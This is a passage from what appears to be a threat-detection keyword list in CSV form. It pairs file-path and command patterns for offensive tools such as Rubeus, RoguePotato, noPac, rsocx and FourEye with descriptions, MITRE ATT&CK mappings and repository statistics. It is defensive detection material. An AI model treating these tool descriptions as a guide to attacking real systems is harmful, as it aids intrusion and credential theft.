"*/rid_hijack.*",".{0,1000}\/rid_hijack\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/rid_hijack.py*",".{0,1000}\/rid_hijack\.py.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*/ridenum/ridenum.py*",".{0,1000}\/ridenum\/ridenum\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/RID-Hijacking.git*",".{0,1000}\/RID\-Hijacking\.git.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","1","N/A","9","2","166","47","2022-09-02T08:43:14Z","2018-07-14T18:48:51Z" "*/Ridter/noPac*",".{0,1000}\/Ridter\/noPac.{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0003 - TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","1","N/A","N/A","8","720","115","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" 
"*/rlogin-brute.nse*",".{0,1000}\/rlogin\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rm_injection.exe*",".{0,1000}\/rm_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/rmi-dumpregistry.nse*",".{0,1000}\/rmi\-dumpregistry\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rmi-vuln-classloader.nse*",".{0,1000}\/rmi\-vuln\-classloader\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ROADtools/*",".{0,1000}\/ROADtools\/.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dirkjanm/ROADtools","1","1","N/A","N/A","10","1667","237","2024-05-01T14:35:20Z","2020-03-28T09:56:08Z" "*/rockyou.txt*",".{0,1000}\/rockyou\.txt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Crack the hash with Hashcat","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rockyou.txt*",".{0,1000}\/rockyou\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/rockyou.txt*",".{0,1000}\/rockyou\.txt.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/RoguePotato.git*",".{0,1000}\/RoguePotato\.git.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service 
Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*/RogueWinRM.git*",".{0,1000}\/RogueWinRM\.git.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","1","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*/RogueWinRMdll*",".{0,1000}\/RogueWinRMdll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/RogueWinRMexe*",".{0,1000}\/RogueWinRMexe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/root/.mozilla/firefox/*.Exegol*",".{0,1000}\/root\/\.mozilla\/firefox\/.{0,1000}\.Exegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/root/dns2tcp*",".{0,1000}\/root\/dns2tcp.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*/root/lsarelayx*",".{0,1000}\/root\/lsarelayx.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - 
TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*/root/output/ratchatPT*",".{0,1000}\/root\/output\/ratchatPT.{0,1000}","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*/root/shellcode.c*",".{0,1000}\/root\/shellcode\.c.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/root/shellcode.cpp*",".{0,1000}\/root\/shellcode\.cpp.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/root/shellcode.exe*",".{0,1000}\/root\/shellcode\.exe.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","739","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/root/viper/*",".{0,1000}\/root\/viper\/.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/root/viper/dist*",".{0,1000}\/root\/viper\/dist.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/rop_emporium*",".{0,1000}\/rop_emporium.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*/ropbuffers.go*",".{0,1000}\/ropbuffers\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*/ropfuscator*",".{0,1000}\/ropfuscator.{0,1000}","offensive_tool_keyword","ropfuscator","ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).","T1090 - T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ropfuscator/ropfuscator","1","1","N/A","N/A","4","397","30","2023-08-11T00:41:55Z","2021-11-16T18:13:57Z" 
"*/rottenpotato*",".{0,1000}\/rottenpotato.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/rpcap-brute.nse*",".{0,1000}\/rpcap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rpcap-info.nse*",".{0,1000}\/rpcap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rpcbomb.rb*",".{0,1000}\/rpcbomb\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/rpcdump.py*",".{0,1000}\/rpcdump\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/rpcdump.py*",".{0,1000}\/rpcdump\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those 
to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*/rpc-grind.nse*",".{0,1000}\/rpc\-grind\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rpcinfo.nse*",".{0,1000}\/rpcinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rpcrt.py *",".{0,1000}\/rpcrt\.py\s.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/yuanLink/CVE-2022-26809","1","0","N/A","N/A","1","61","27","2022-05-25T00:57:52Z","2022-05-01T13:19:10Z" "*/rpivot.git*",".{0,1000}\/rpivot\.git.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" 
"*/rsa-vuln-roca.nse*",".{0,1000}\/rsa\-vuln\-roca\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rservices_from_users.txt*",".{0,1000}\/rservices_from_users\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/rsockstun *",".{0,1000}\/rsockstun\s.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","0","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" "*/rsockstun.git*",".{0,1000}\/rsockstun\.git.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","1","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" "*/rsocx-*-linux-x86-64.zip*",".{0,1000}\/rsocx\-.{0,1000}\-linux\-x86\-64\.zip.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*/rsocx-*-windows-x86-64.zip*",".{0,1000}\/rsocx\-.{0,1000}\-windows\-x86\-64\.zip.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*/rsocx.exe*",".{0,1000}\/rsocx\.exe.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - 
T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*/rsocx.git*",".{0,1000}\/rsocx\.git.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*/rsync-brute.nse*",".{0,1000}\/rsync\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rsync-list-files.py*",".{0,1000}\/rsync\-list\-files\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*/rsync-list-modules.nse*",".{0,1000}\/rsync\-list\-modules\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rt_hijacking.exe*",".{0,1000}\/rt_hijacking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/rtsp-methods.nse*",".{0,1000}\/rtsp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/rtsp-url-brute.nse*",".{0,1000}\/rtsp\-url\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Rubeus*",".{0,1000}\/Rubeus.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*/Rubeus.exe*",".{0,1000}\/Rubeus\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","8","2","2024-04-29T01:58:07Z","2021-12-10T15:04:35Z" "*/Rubeus.exe*",".{0,1000}\/Rubeus\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Rubeus.git*",".{0,1000}\/Rubeus\.git.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*/Rubeus/*",".{0,1000}\/Rubeus\/.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*/Rudrastra.git*",".{0,1000}\/Rudrastra\.git.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","61","20","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" "*/ruler --domain *",".{0,1000}\/ruler\s\-\-domain\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*/ruler --email *",".{0,1000}\/ruler\s\-\-email\s.{0,1000}","offensive_tool_keyword","ruler","A tool to 
